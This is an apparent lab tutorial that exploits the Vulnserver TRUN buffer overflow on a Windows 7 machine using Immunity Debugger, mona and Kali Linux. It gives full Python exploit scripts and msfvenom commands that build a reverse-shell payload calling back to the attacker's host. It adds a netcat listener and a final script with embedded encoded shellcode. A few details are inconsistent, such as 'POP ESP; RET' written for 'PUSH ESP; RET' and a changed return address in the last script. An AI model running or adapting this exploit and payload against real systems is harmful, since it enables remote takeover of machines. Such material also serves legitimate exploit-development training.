Look in the lower left pane of Immunity.

All the bytes from 01 to FF appear in order, followed by ‘F’ characters (46 in hexadecimal).

There are no other bad bytes–only ‘\x00’.

Finding Useful Assembly Code

We have control over the EIP, so we can point to any executable code we wish. What we need to do is find a way to execute the bytes at the location in ESP.

There are two simple instructions that will work: “JMP ESP” and the two-instruction sequence “PUSH ESP; RET”.

To find these instructions, we need to examine the modules loaded when Vulnerable Server is running.

Installing MONA

MONA is a python module which gives Immunity the ability to list modules and search through them.

On your Windows machine, open Internet Explorer, and open this page:

http://redmine.corelan.be/projects/mona

In the “Download” section, right-click the “here“link below, and click “Save Target As“. Save the file in your Downloads folder.

Alternate Download Link

mona.7z

On the taskbar, click the yellow folder icon to open Windows Explorer. Navigate to your Downloads folder. Right-click mona and click Copy, as shown below.

In Windows Explorer, in the left pane, expand the Computer container.

If you are using a 64-bit system, navigate to:

C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands

IIf you are using a 32-bit system, navigate to:

C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

In the right pane of Windows Explorer, right-click and click Paste.

A box pops up saying “You’ll need to provide administrator permission…”. Click Continue.

Mona appears in the window, as shown below.

Attaching Vulnerable Server in Immunity

Close Immunity.

Double-click vulnserver to restart it.

On your Windows desktop, right-click “Immunity Debugger” and click “Run as Administrator“. In the User Account Control box, click Yes.

In Immunity, click FileAttach. Click vulnserver and click Attach.

Don’t click the “Run” button yet–it’s easier to use Mona with the program Paused.

Listing Modules with Mona

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:


!mona modules

The window fills with tiny green text. as shown below.

Right-click an empty portion of the window and click AppearanceFont, “OEM Fixed Font, as shown below.

Focus on the chart at the bottom, as shown below.

This chart shows all the modules loaded as part of Vulnerable Server, and several important properties for each one.

The property of most importance to us now is ASLR, which causes the address of the module to vary each time it is restarted.

Another property that can cause trouble is “Rebase”, which relocates a module if another module is already loaded in its preferred memory location.

To make the most reliable exploit, we want to use a module without ASLR or Rebase.

There are two modules with “False” in both the Rebase and ASLR columns: essfunc.dll and vulnserver.exe.

However, notice the address values at the left of the chart–vulnserver.exe is loaded at very low address values, starting with 0x00, so any reference to addresses within vulnserver.exe will require a null byte, and that won’t work because ‘\x00’ is a bad character.

So the only usable module is essfunc.dll.

Finding Hex Codes for Useful instruction

Kali Linux contains a handy utility for converting assembly language to hex codes.

In Kali Linux, in a Terminal window, execute this command:

locate nasm_shell

The utility is located in a metasploit-framework directory, as shown below.

Copy and paste in the complete utility path to execute it.

Once nasm starts, type JMP ESP and press Enter to convert it to hexadecimal codes, as shown below.

Then type in POP ESP and press Enter.

Then type in RET and press Enter.

Then type in EXIT and press Enter.

The hexadecimal code for a “JMP ESP” instruction is FFE4.

The hexadecimal code for the two-instruction sequence “POP ESP; RET” is 5CC3.

If we can find either of those byte sequences in essfunc.dll, we can use them to run our exploit.

Finding JMP ESP with MONA

In Immunity, at the bottom, execute this command in the white bar.


!mona find -s "\xff\xe4" -m essfunc.dll

This searches the essfunc.dll module for the bytes FFE4.

9 locations were found with those contents, as shown below.

We’ll use the first location:

625011af

or

Mona will fetch us what we need with a simple command of: !mona jmp -r esp 

above we see the JMP ESP  return address ( 625011af )  in  little endian format (=backwards)  !

.

then press F2 to set break-point ( address will turn blue ), then click play, and execute our script

(  break-point, not necessary, but included as additional info )

Starting Vulnerable Server in Immunity

In Immunity, you are looking at the “Log window”, with the green text Mona made. Close that window.

Now you should see the normal view, which is the “CPU window”, as shown below.

Click the “Run” button. The Status at the lower right should say “Running”, as shown below.

Testing Code Execution

Now we’ll send an attack that puts the JMP ESP address (625011af) into the EIP.

That will start executing code at the location ESP points to.

Just to test it, we’ll put some NOP instructions there (‘\x90’ = No Operation — they do nothing) followed by a ‘\xCC’ INT 3 instruction, which will interrupt processing.

The NOP sled may seem unimportant, but it’s needed to make room to unpack the Matasploit packed exploit code we’ll make later.

If this works, the program will stop at the ‘\xCC’ instruction.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-eip3

In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-eip3

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-eip3

The lower left corner of the Immunity window now says “INT 3 command”, as shown below.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it’s highlighted in blue.

Then right-click the highlighted value and click “Follow in Dump“.

The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte.

This is working! We are able to inject code and execute it.

Restarting the Vulnerable Server without Immunity

Close Immunity.

Double-click vulnserver to restart it.

Don’t bother to use the debugger now–if everything is working, the exploit will work on the real server.

Preparing the Python Attack Code

This program sets up the exploit, but at the moment the exploit code is missing.

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-shell

In the nano window, type or paste this code.

Replace the IP address with the IP address of your Windows 7 machine.

#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999

prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
exploit = (

)
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Creating Exploit Code

On your Kali Linux machine, in a Terminal window, execute this command.

ifconfig

Find your Kali machine’s IP address and make a note of it.

On your Kali Linux machine, in a Terminal window, execute the command below.

Replace the IP address with the IP address of your Kali Linux machine.

msfpayload windows/shell_reverse_tcp LHOST="192.168.119.129" LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai

 

new style  : ~/VHL# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.139 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d”

or ~/VHL# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.139 LPORT=443 EXITFUNC=thread -b “\x00\x0a\x0d” -f python -v payload

This command makes an exploit that will connect from the Windows target back to the Kali Linux attacker on port 443 and execute commands from Kali.

The exploit is encoded to avoid null bytes. because ‘\x00’ is a bad character.

Use the mouse to highlight the exploit code, as shown below. Right-click the highlighted code and click Copy.

Inserting the Exploit Code into Python

On your Kali Linux machine, in a Terminal window, execute this command:

nano vs-shell

Use the down-arrow key to move the cursor into the blank line below this line:

exploit = (

Right-click and click Paste, as shown below.

The exploit code appears in the file, as shown below.

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:

chmod a+x vs-shell

Starting a Listener

On your Kali Linux machine, open a new Terminal window and execute this command:

nc -nlvp 443

This starts a listener on port 443, to take control of the Windows target.

Running the Exploit

On your Kali Linux machine, in a Terminal window, execute this command:

./vs-shell

In Kali Linux, the other Terminal window shows a Windows prompt, as shown below. You now control the Windows machine!

Final script I used :

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.1.139"
port = 9999

nop = "\x90" * 15

shellcode = ("\xbb\xc9\xf1\x20\xb7\xda\xc0\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x5a\x12\x83\xc2\x04\x03\x93\xff\xc2\x42\xdf\xe8\x81"
"\xad\x1f\xe9\xe5\x24\xfa\xd8\x25\x52\x8f\x4b\x96\x10\xdd\x67"
"\x5d\x74\xf5\xfc\x13\x51\xfa\xb5\x9e\x87\x35\x45\xb2\xf4\x54"
"\xc5\xc9\x28\xb6\xf4\x01\x3d\xb7\x31\x7f\xcc\xe5\xea\x0b\x63"
"\x19\x9e\x46\xb8\x92\xec\x47\xb8\x47\xa4\x66\xe9\xd6\xbe\x30"
"\x29\xd9\x13\x49\x60\xc1\x70\x74\x3a\x7a\x42\x02\xbd\xaa\x9a"
"\xeb\x12\x93\x12\x1e\x6a\xd4\x95\xc1\x19\x2c\xe6\x7c\x1a\xeb"
"\x94\x5a\xaf\xef\x3f\x28\x17\xcb\xbe\xfd\xce\x98\xcd\x4a\x84"
"\xc6\xd1\x4d\x49\x7d\xed\xc6\x6c\x51\x67\x9c\x4a\x75\x23\x46"
"\xf2\x2c\x89\x29\x0b\x2e\x72\x95\xa9\x25\x9f\xc2\xc3\x64\xc8"
"\x27\xee\x96\x08\x20\x79\xe5\x3a\xef\xd1\x61\x77\x78\xfc\x76"
"\x78\x53\xb8\xe8\x87\x5c\xb9\x21\x4c\x08\xe9\x59\x65\x31\x62"
"\x99\x8a\xe4\x25\xc9\x24\x57\x86\xb9\x84\x07\x6e\xd3\x0a\x77"
"\x8e\xdc\xc0\x10\x25\x27\x83\xde\x12\x26\xd8\xb7\x60\x28\xdf"
"\xfc\xec\xce\xb5\x12\xb9\x59\x22\x8a\xe0\x11\xd3\x53\x3f\x5c"
"\xd3\xd8\xcc\xa1\x9a\x28\xb8\xb1\x4b\xd9\xf7\xeb\xda\xe6\x2d"
"\x83\x81\x75\xaa\x53\xcf\x65\x65\x04\x98\x58\x7c\xc0\x34\xc2"
"\xd6\xf6\xc4\x92\x11\xb2\x12\x67\x9f\x3b\xd6\xd3\xbb\x2b\x2e"
"\xdb\x87\x1f\xfe\x8a\x51\xc9\xb8\x64\x10\xa3\x12\xda\xfa\x23"
"\xe2\x10\x3d\x35\xeb\x7c\xcb\xd9\x5a\x29\x8a\xe6\x53\xbd\x1a"
"\x9f\x89\x5d\xe4\x4a\x0a\x7d\x07\x5e\x67\x16\x9e\x0b\xca\x7b"
"\x21\xe6\x09\x82\xa2\x02\xf2\x71\xba\x67\xf7\x3e\x7c\x94\x85"
"\x2f\xe9\x9a\x3a\x4f\x38")

#Generated with msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.139 lport=443 EXITFUNC=thread -b "\x00" -f c

buffer = "A" * 2002
buffer += "\xbb\x11\x50\x62" #This is for our JMP ESP address in reverse order (little-endian)
buffer += nop
buffer += shellcode
buffer += "C" * (5000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send("TRUN /.:/ " + buffer)
print s.recv(1024)
s.close()

Sources

Debugging Fundamentals for Exploit Development

Stack Based Buffer Overflow Tutorial, part 1 – Introduction

Introducing Vulnserver

Offensive Security Certified Professional classes

MinHook – The Minimalistic x86/x64 API Hooking Library (Good JMP Examples)

Msfpayload


also used : https://h0mbre.github.io/Boofuzz_to_EIP_Overwrite/#

popping a calc code : https://github.com/puckiestyle/python/blob/master/vulnserver.py

Video tutorials: